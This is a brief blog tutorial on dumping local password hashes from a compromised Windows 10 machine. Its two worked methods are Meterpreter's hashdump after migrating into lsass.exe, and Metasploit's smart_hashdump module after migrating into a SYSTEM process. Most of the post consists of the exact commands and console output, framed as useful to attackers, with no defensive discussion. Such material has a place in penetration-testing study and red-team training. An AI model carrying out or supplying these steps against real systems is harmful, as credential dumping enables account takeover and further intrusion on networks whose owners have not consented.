top of page

Obtaining Windows 10 Password Hashes


Gaining access to local password hashes on a Windows 10 system can be crucial for attackers. Two main methods are discussed here: using the Meterpreter hashdump command and leveraging the Metasploit smart_hashdump module.


Method 1: Using Meterpreter hashdump


Step-by-Step Process:


  1. Initial Attempt to Dump Hashes:

meterpreter > hashdump

This command often fails due to modern protections in Windows:

[-] priv_passwd_get_sam_hashes: Operation failed: The parameter is incorrect.

2. Identify lsass.exe Process:

 meterpreter > ps -S lsass.exe

3. Migrate to lsass.exe:

meterpreter > migrate 620 
[*] Migrating from 1248 to 620 ... 
[*] Migration completed successfully.

4. Dump Hashes After Migration:

meterpreter > hashdump

Note: If migration fails, you may need to try migrating to another SYSTEM process first before migrating to lsass.exe.


Method 2: Using Metasploit smart_hashdump Module


Step-by-Step Process:

  1. Identify a SYSTEM Process:

meterpreter > ps -A x64 -a

Choose a SYSTEM process (avoid svchost.exe).

2. Migrate to Chosen Process:

meterpreter > migrate 1404 
[*] Migrating from 448 to 1404 ... 
[*] Migration completed successfully.

3. Run smart_hashdump:

meterpreter > run post/windows/gather/smart_hashdump

Successful output saves the hashes to a file:



Advantages of smart_hashdump:

  • Attempts to retrieve both local and domain account password hashes if the target is a domain controller.

  • Bypasses some of the limitations of directly dumping from lsass.exe.


Conclusion

Using tools like Meterpreter's hashdump and Metasploit's smart_hashdump module, attackers can effectively extract password hashes from Windows 10 systems


We will continue in next blog...........................................................


Akash Patel


37 views0 comments
bottom of page